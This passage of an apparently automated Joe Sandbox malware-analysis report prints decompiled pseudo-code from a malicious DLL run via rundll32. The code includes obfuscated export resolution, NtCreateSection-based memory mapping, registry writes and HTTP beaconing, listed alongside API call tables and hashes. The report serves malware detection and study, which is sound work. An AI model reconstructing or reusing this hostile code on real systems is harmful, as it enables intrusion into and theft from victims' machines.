                                				void* _t34;
                                				char* _t36;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				char* _t40;
                                				char* _t42;
                                				char* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x106a348; // 0x409d5a8
                                				_t1 = _t9 + 0x106b624; // 0x253d7325
                                				_t36 = 0;
                                				_t28 = E0106624E(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t39 = __imp__;
                                					_t13 =  *_t39(_t28, _t38);
                                					_v8 = _t13;
                                					_t6 =  *_t39(_a4) + 1; // 0x51095b1
                                					_t40 = E01066D63(_v8 + _t6);
                                					if(_t40 != 0) {
                                						strcpy(_t40, _t28);
                                						_pop(_t33);
                                						__imp__(_t40, _a4);
                                						_t19 = E010624B3(_t33, _t34, _t40, _a8); // executed
                                						_t36 = _t19;
                                						E01066C2C(_t40);
                                						_t42 = E01065A07(StrTrimA(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E01066C2C(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E01064162(_t36, _t33);
                                						if(_t43 != 0) {
                                							E01066C2C(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E01066C2C(_t28);
                                				}
                                				return _t36;
                                			}
















                                0x01061d33
                                0x01061d36
                                0x01061d37
                                0x01061d3e
                                0x01061d45
                                0x01061d4c
                                0x01061d50
                                0x01061d57
                                0x01061d5e
                                0x01061d63
                                0x01061d6b
                                0x01061d75
                                0x01061d79
                                0x01061d7d
                                0x01061d83
                                0x01061d88
                                0x01061d92
                                0x01061d98
                                0x01061d9a
                                0x01061db1
                                0x01061db5
                                0x01061db8
                                0x01061dbd
                                0x01061dbd
                                0x01061dc6
                                0x01061dca
                                0x01061dcd
                                0x01061dd2
                                0x01061dd2
                                0x01061dca
                                0x01061dd5
                                0x01061dda
                                0x01061de0

                                APIs
                                  • Part of subcall function 0106624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01061D4C,253D7325,00000000,00000000,?,7477C740,010658D7), ref: 010662B5
                                  • Part of subcall function 0106624E: sprintf.NTDLL ref: 010662D6
                                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7477C740,010658D7,00000000,051095B0), ref: 01061D5E
                                • lstrlen.KERNEL32(00000000,?,7477C740,010658D7,00000000,051095B0), ref: 01061D66
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • strcpy.NTDLL ref: 01061D7D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01061D88
                                  • Part of subcall function 010624B3: lstrlen.KERNEL32(00000000,00000000,010658D7,00000000,?,01061D97,00000000,010658D7,?,7477C740,010658D7,00000000,051095B0), ref: 010624C4
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,010658D7,?,7477C740,010658D7,00000000,051095B0), ref: 01061DA5
                                  • Part of subcall function 01065A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,01061DB1,00000000,?,7477C740,010658D7,00000000,051095B0), ref: 01065A11
                                  • Part of subcall function 01065A07: _snprintf.NTDLL ref: 01065A6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 2864389247-1428090586
                                • Opcode ID: b799b7efca253e00382b6ddfcc6be46fc83f4861e4bde980e9a847d4d0305f07
                                • Instruction ID: 72d78cdbb7478d859a535f3fda10b297502daf7cd0c4c85bfac9e29d86de8a84
                                • Opcode Fuzzy Hash: b799b7efca253e00382b6ddfcc6be46fc83f4861e4bde980e9a847d4d0305f07
                                • Instruction Fuzzy Hash: D811E533E016267B57227BB99C84CEF3AEDDEA95643050015FA84EB104CE7ACD0287E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 309 1063f07-1063f39 call 1061f7a 312 1064021-1064027 309->312 313 1063f3f-1063f4f call 1065634 309->313 316 1063f55-1063f67 SysAllocString 313->316 317 1064018-106401d 313->317 318 1063fe6-1063fea 316->318 319 1063f69-1063f7c SysAllocString 316->319 317->312 321 1063ff5-1063ff9 318->321 322 1063fec-1063fef SysFreeString 318->322 319->318 320 1063f7e-1063f82 319->320 325 1063f96-1063fe0 320->325 326 1063f84-1063f8e SysAllocString 320->326 323 1064004-1064006 321->323 324 1063ffb-1063ffe SysFreeString 321->324 322->321 327 106400f-1064014 323->327 328 1064008-1064009 SysFreeString 323->328 324->323 330 1063fe4 325->330 326->321 329 1063f90-1063f92 326->329 327->317 328->327 329->325 330->318
                                APIs
                                  • Part of subcall function 01061F7A: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,051089D0,01063F35,?,?,?,?,?,?,?,?,?,?,?,01063F35), ref: 01062047
                                  • Part of subcall function 01065634: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 01065671
                                  • Part of subcall function 01065634: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 010656A2
                                • SysAllocString.OLEAUT32(00000000), ref: 01063F61
                                • SysAllocString.OLEAUT32(0070006F), ref: 01063F75
                                • SysAllocString.OLEAUT32(00000000), ref: 01063F87
                                • SysFreeString.OLEAUT32(00000000), ref: 01063FEF
                                • SysFreeString.OLEAUT32(00000000), ref: 01063FFE
                                • SysFreeString.OLEAUT32(00000000), ref: 01064009
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                • String ID:
                                • API String ID: 2831207796-0
                                • Opcode ID: 62240588ea6dae6caeca7352e82a8f5daf78ae186e237ef86942bc8bbb19ceec
                                • Instruction ID: 0cfb3562b47a307836a5cc9665e12007b3914f0db6367cfec5a3cd95a492091c
                                • Opcode Fuzzy Hash: 62240588ea6dae6caeca7352e82a8f5daf78ae186e237ef86942bc8bbb19ceec
                                • Instruction Fuzzy Hash: 0A417F32900609AFEF01DFFCD844A9EBBB9EF49210F144466FA54EB260DA72D905CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 372 10644de-10644f1 call 1066d63 375 10644f7-106452c GetModuleHandleA GetProcAddress 372->375 376 10645b3 372->376 378 106452e-1064542 GetProcAddress 375->378 379 10645ab-10645b1 call 1066c2c 375->379 377 10645ba-10645c1 376->377 378->379 381 1064544-1064558 GetProcAddress 378->381 379->377 381->379 383 106455a-106456e GetProcAddress 381->383 383->379 384 1064570-1064584 GetProcAddress 383->384 384->379 385 1064586-1064598 call 106190c 384->385 387 106459d-10645a2 385->387 387->379 388 10645a4-10645a9 387->388 388->377
                                C-Code - Quality: 100%
                                			E010644DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E01066D63(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x106a348; // 0x409d5a8
                                					_t1 = _t23 + 0x106b11a; // 0x4c44544e
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x106a348; // 0x409d5a8
                                					_t2 = _t26 + 0x106b761; // 0x7243775a
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E01066C2C(_t54);
                                					} else {
                                						_t30 =  *0x106a348; // 0x409d5a8
                                						_t5 = _t30 + 0x106b74e; // 0x614d775a
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x106a348; // 0x409d5a8
                                							_t7 = _t33 + 0x106b771; // 0x6e55775a
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x106a348; // 0x409d5a8
                                								_t9 = _t36 + 0x106b4ca; // 0x4e6c7452
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x106a348; // 0x409d5a8
                                									_t11 = _t39 + 0x106b786; // 0x6c43775a
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E0106190C(_t54, _a8); // executed
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}


















                                0x010644ed
                                0x010644f1
                                0x010645b3
                                0x010644f7
                                0x010644f7
                                0x010644fc
                                0x0106450f
                                0x01064511
                                0x01064516
                                0x0106451e
                                0x01064525
                                0x01064527
                                0x0106452c
                                0x010645ab
                                0x010645ac
                                0x0106452e
                                0x0106452e
                                0x01064533
                                0x0106453b
                                0x0106453d
                                0x01064542
                                0x00000000
                                0x01064544
                                0x01064544
                                0x01064549
                                0x01064551
                                0x01064553
                                0x01064558
                                0x00000000
                                0x0106455a
                                0x0106455a
                                0x0106455f
                                0x01064567
                                0x01064569
                                0x0106456e
                                0x00000000
                                0x01064570
                                0x01064570
                                0x01064575
                                0x0106457d
                                0x0106457f
                                0x01064584
                                0x00000000
                                0x01064586
                                0x0106458c
                                0x01064591
                                0x01064598
                                0x0106459d
                                0x010645a2
                                0x00000000
                                0x010645a4
                                0x010645a7
                                0x010645a7
                                0x010645a2
                                0x01064584
                                0x0106456e
                                0x01064558
                                0x01064542
                                0x0106452c
                                0x010645c1

                                APIs
                                  • Part of subcall function 01066D63: RtlAllocateHeap.NTDLL(00000000,00000000,01065D7B), ref: 01066D6F
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01064046,?,?,?,?,00000000,00000000), ref: 01064503
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01064525
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0106453B
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01064551
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01064567
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0106457D
                                  • Part of subcall function 0106190C: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76D84EE0,00000000,00000000,0106459D), ref: 01061969
                                  • Part of subcall function 0106190C: memset.NTDLL ref: 0106198B
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 3012371009-0
                                • Opcode ID: 9ef7278619f92a07212a0cce78210e8e04b49ad92e6999754f95e8c160866561
                                • Instruction ID: 414662c7b871fe981ebc540d5db3f90086aa8c81afd2b620edc6591677c0b56e
                                • Opcode Fuzzy Hash: 9ef7278619f92a07212a0cce78210e8e04b49ad92e6999754f95e8c160866561
                                • Instruction Fuzzy Hash: 212192B060070BEFD720EF69C884E9ABBFCEF446007054465F685D7621EB74E9098FA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E01066954(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                				void* __esi;
                                				long _t10;
                                				void* _t18;
                                				void* _t22;
                                
                                				_t9 = __eax;
                                				_t22 = __eax;
                                				if(_a4 != 0) {
                                					_t9 = E010645C4(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                					if(_t9 == 0) {
                                						L9:
                                						return GetLastError();
                                					}
                                				}
                                				_t10 = E01067AF1(_t9, _t18, _t22, _a8); // executed
                                				if(_t10 == 0) {
                                					ResetEvent( *(_t22 + 0x1c));
                                					ResetEvent( *(_t22 + 0x20));
                                					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                						SetEvent( *(_t22 + 0x1c));
                                						goto L7;
                                					} else {
                                						_t10 = GetLastError();
                                						if(_t10 == 0x3e5) {
                                							L7:
                                							_t10 = 0;
                                						}
                                					}
                                				}
                                				if(_t10 == 0xffffffff) {
                                					goto L9;
                                				}
                                				return _t10;
                                			}







                                0x01066954
                                0x01066961
                                0x01066963
                                0x0106696e
                                0x01066975
                                0x010669c6
                                0x00000000
                                0x010669c6
                                0x01066975
                                0x0106697b
                                0x01066982
                                0x0106698e
                                0x01066993
                                0x010669a9
                                0x010669b9
                                0x00000000
                                0x010669ab
                                0x010669ab
                                0x010669b2
                                0x010669bf
                                0x010669bf
                                0x010669bf
                                0x010669b2
                                0x010669a9
                                0x010669c4
                                0x00000000
                                0x00000000
                                0x010669ca

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,010637A0,?,?,76DC81D0,00000000), ref: 0106698E
                                • ResetEvent.KERNEL32(?), ref: 01066993
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010669A0
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?,?), ref: 010669AB
                                • GetLastError.KERNEL32(?,?,00000102,010637A0,?,?,76DC81D0,00000000), ref: 010669C6
                                  • Part of subcall function 010645C4: lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,01066973,?,?,?,?,00000102,010637A0,?,?,76DC81D0), ref: 010645D0
                                  • Part of subcall function 010645C4: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01066973,?,?,?,?,00000102,010637A0,?), ref: 0106462E
                                  • Part of subcall function 010645C4: lstrcpy.KERNEL32(00000000,00000000), ref: 0106463E
                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0106593D,00000000,?), ref: 010669B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: d666825ea074ee7cd08489a11312183e851f328ad98da908e07472137b71e77f
                                • Instruction ID: 57f3fe3cb641d37dce02b18515a3e7f0424c053989c6e69471179287341d2046
                                • Opcode Fuzzy Hash: d666825ea074ee7cd08489a11312183e851f328ad98da908e07472137b71e77f
                                • Instruction Fuzzy Hash: 5E016D31104201AEEB316A79ED44F9B7AECEF85368F100665F9D1914E5D632E404DA60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 88%
                                			E01063472(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				char* _t59;
                                				intOrPtr* _t60;
                                				void* _t62;
                                				intOrPtr _t64;
                                				char _t65;
                                				void* _t67;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				void* _t70;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x106a3dc);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E010661FC( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					_t62 = E01066F28(_t92, _t97, _t101, _t91, _t59); // executed
                                					if(_t62 != 0) {
                                						L27:
                                						E01066C2C(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x106a318; // 0x5109d70
                                					_t16 = _t64 + 0xc; // 0x5109e92
                                					_t65 = E010661FC(_t64,  *_t16);
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d010690, executed
                                						_t67 = E01064822(_t97,  *_t33, _t91, _a8,  *0x106a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                                						if(_t67 == 0) {
                                							_t68 =  *0x106a348; // 0x409d5a8
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x106ba4c; // 0x4d4c4b48
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x106ba47; // 0x55434b48
                                								_t69 = _t34;
                                							}
                                							_t70 = E010662F6(_t69,  *0x106a3d4,  *0x106a3d8,  &_a24,  &_a16); // executed
                                							if(_t70 == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x106a348; // 0x409d5a8
                                									_t44 = _t71 + 0x106b842; // 0x74666f53
                                									_t73 = E010661FC(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d010690
                                										E010674B6( *_t47, _t91, _a8,  *0x106a3d8, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d010690
                                										E010674B6( *_t49, _t91, _t99,  *0x106a3d0, _a16);
                                										E01066C2C(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d010690, executed
                                									E010674B6( *_t40, _t91, _a8,  *0x106a3d8, _a24); // executed
                                									_t43 = _t101 + 0x10; // 0x3d010690
                                									E010674B6( *_t43, _t91, _a8,  *0x106a3d0, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E01066C2C(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d010690, executed
                                					_t81 = E010612CA( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d010690
                                							E01064822(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E01066C2C(_t100);
                                						_t98 = _a16;
                                					}
                                					E01066C2C(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                					goto L29;
                                				} else {
                                					_t97 = _a8;
                                					E01067A1E(_t98, _a8,  &_v284);
                                					__imp__(_t102 + _t98 - 0x117,  *0x106a3dc);
                                					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                					_t91 = 0x80000003;
                                					goto L6;
                                				}
                                			}


























                                0x01063472
                                0x0106347b
                                0x01063482
                                0x01063487
                                0x010634f4
                                0x010634fa
                                0x010634ff
                                0x01063506
                                0x0106350b
                                0x01063510
                                0x0106367b
                                0x01063682
                                0x01063682
                                0x01063687
                                0x01063689
                                0x01063689
                                0x01063692
                                0x01063692
                                0x01063516
                                0x0106351b
                                0x01063522
                                0x01063671
                                0x01063674
                                0x00000000
                                0x01063674
                                0x01063528
                                0x0106352d
                                0x01063530
                                0x01063535
                                0x0106353a
                                0x01063583
                                0x01063583
                                0x01063596
                                0x01063599
                                0x010635a0
                                0x010635a6
                                0x010635ad
                                0x010635b7
                                0x010635b7
                                0x010635af
                                0x010635af
                                0x010635af
                                0x010635af
                                0x010635d2
                                0x010635d9
                                0x010635e1
                                0x0106360f
                                0x01063614
                                0x0106361b
                                0x01063620
                                0x01063624
                                0x01063656
                                0x01063626
                                0x01063633
                                0x01063636
                                0x01063646
                                0x01063649
                                0x0106364f
                                0x0106364f
                                0x010635e3
                                0x010635f0
                                0x010635f3
                                0x01063605
                                0x01063608
                                0x01063608
                                0x01063660
                                0x0106366c
                                0x01063662
                                0x01063665
                                0x01063665
                                0x01063660
                                0x010635d9
                                0x00000000
                                0x010635a0
                                0x01063549
                                0x0106354c
                                0x01063553
                                0x01063559
                                0x0106355c
                                0x0106355e
                                0x0106356a
                                0x0106356d
                                0x0106356d
                                0x01063573
                                0x01063578
                                0x01063578
                                0x0106357e
                                0x00000000
                                0x0106357e
                                0x0106348c
                                0x00000000
                                0x010634b3
                                0x010634b3
                                0x010634bf
                                0x010634d2
                                0x010634d8
                                0x010634e0
                                0x00000000
                                0x010634e0

                                APIs
                                • StrChrA.SHLWAPI(01067168,0000005F,00000000,00000000,00000104), ref: 010634A5
                                • lstrcpy.KERNEL32(?,?), ref: 010634D2
                                  • Part of subcall function 010661FC: lstrlen.KERNEL32(?,00000000,05109D70,00000000,010639E8,05109F93,69B25F44,?,?,?,?,69B25F44,00000005,0106A00C,4D283A53,?), ref: 01066203
                                  • Part of subcall function 010661FC: mbstowcs.NTDLL ref: 0106622C
                                  • Part of subcall function 010661FC: memset.NTDLL ref: 0106623E
                                  • Part of subcall function 010674B6: lstrlenW.KERNEL32(?,?,?,0106363B,3D010690,80000002,01067168,01067283,74666F53,4D4C4B48,01067283,?,3D010690,80000002,01067168,?), ref: 010674DB
                                  • Part of subcall function 01066C2C: RtlFreeHeap.NTDLL(00000000,00000000,01065E1D,00000000,?,?,00000000), ref: 01066C38
                                • lstrcpy.KERNEL32(?,00000000), ref: 010634F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.643055238.0000000001061000.00000020.10000000.00040000.00000000.sdmp, Offset: 01060000, based on PE: true
                                • Associated: 00000003.00000002.643018010.0000000001060000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643079216.0000000001069000.00000002.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643090843.000000000106A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.643116170.000000000106C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_1060000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 801165e8ed62acb90dfae804e5ffcb910ce4c868ba2cb8a6db83e936c2b3618a
                                • Instruction ID: f3dea2c5f91641f0e96c887598d9aee525851d15090e703cb57269bdea19deb2
                                • Opcode Fuzzy Hash: 801165e8ed62acb90dfae804e5ffcb910ce4c868ba2cb8a6db83e936c2b3618a
                                • Instruction Fuzzy Hash: 59514C7150020AEFDF22AFA4DC40DEA7BBDFF08254F008554FA999B160D776DA25EB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E01063D2C(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				CHAR* _v16;
                                				long _v20;
                                				void* __ebx;
                                				void* __edi;
                                				void* __esi;
                                				void* _t21;
                                				CHAR* _t22;
                                				CHAR* _t25;
                                				intOrPtr _t26;
                                				void* _t27;
                                				void* _t31;
                                				void* _t32;
                                				CHAR* _t36;
                                				CHAR* _t42;
                                				CHAR* _t43;
                                				CHAR* _t44;
                                				void* _t49;
                                				void* _t51;
                                				signed char _t56;
                                				intOrPtr _t58;
                                				signed int _t59;
                                				void* _t63;
                                				CHAR* _t67;
                                				CHAR* _t68;
                                				char* _t69;
                                				void* _t70;
                                
                                				_t61 = __edx;
                                				_v20 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t21 = E01063CFD();
                                				if(_t21 != 0) {
                                					_t59 =  *0x106a2fc; // 0x4000000a
                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                					 *0x106a2fc = (_t59 & 0xf0000000) + _t21;
                                				}
                                				_t22 =  *0x106a178(0, 2); // executed
                                				_v16 = _t22;
                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                					_t25 = E0106389E( &_v8,  &_v20); // executed
                                					_t54 = _t25;
                                					_t26 =  *0x106a348; // 0x409d5a8
                                					if( *0x106a2fc > 5) {
                                						_t8 = _t26 + 0x106b5c5; // 0x4d283a53
                                						_t27 = _t8;
                                					} else {
                                						_t7 = _t26 + 0x106b9fd; // 0x44283a44
                                						_t27 = _t7;
                                					}
                                					E01066B80(_t27, _t27);
                                					_t31 = E010676BB(_t61,  &_v20,  &_v12); // executed
                                					if(_t31 == 0) {
                                						CloseHandle(_v20);
                                					}
                                					_t63 = 5;
                                					if(_t54 != _t63) {
                                						 *0x106a310 =  *0x106a310 ^ 0x81bbe65d;
                                						_t32 = E01066D63(0x60);
                                						 *0x106a3cc = _t32;
                                						__eflags = _t32;
                                						if(_t32 == 0) {
                                							_push(8);
                                							_pop(0);
                                						} else {
                                							memset(_t32, 0, 0x60);
                                							_t49 =  *0x106a3cc; // 0x51095b0
                                							_t70 = _t70 + 0xc;
                                							__imp__(_t49 + 0x40);
                                							_t51 =  *0x106a3cc; // 0x51095b0
                                							 *_t51 = 0x106b827;
                                						}
                                						_t54 = 0;
                                						__eflags = 0;
                                						if(0 == 0) {
                                							_t36 = RtlAllocateHeap( *0x106a2d8, 0, 0x43);
                                							 *0x106a368 = _t36;
                                							__eflags = _t36;
                                							if(_t36 == 0) {
                                								_push(8);
                                								_pop(0);
                                							} else {
                                								_t56 =  *0x106a2fc; // 0x4000000a
                                								_t61 = _t56 & 0x000000ff;
                                								_t58 =  *0x106a348; // 0x409d5a8
                                								_t13 = _t58 + 0x106b552; // 0x697a6f4d
                                								_t55 = _t13;
                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1069287);
                                							}
                                							_t54 = 0;
                                							__eflags = 0;
                                							if(0 == 0) {
                                								asm("sbb eax, eax");
                                								E01063365( ~_v8 &  *0x106a310, 0x106a00c); // executed
                                								_t42 = E01061645(0, _t55, _t63, 0x106a00c); // executed
                                								_t54 = _t42;
                                								__eflags = _t54;
                                								if(_t54 != 0) {
                                									goto L30;
                                								}
                                								_t43 = E01063981(); // executed
                                								__eflags = _t43;
                                								if(_t43 != 0) {
                                									__eflags = _v8;
                                									_t67 = _v12;
                                									if(_v8 != 0) {
                                										L29:
                                										_t44 = E0106661D(_t61, _t67, _v8); // executed
                                										_t54 = _t44;
                                										goto L30;
                                									}
                                									__eflags = _t67;
                                									if(__eflags == 0) {
                                										goto L30;
                                									}
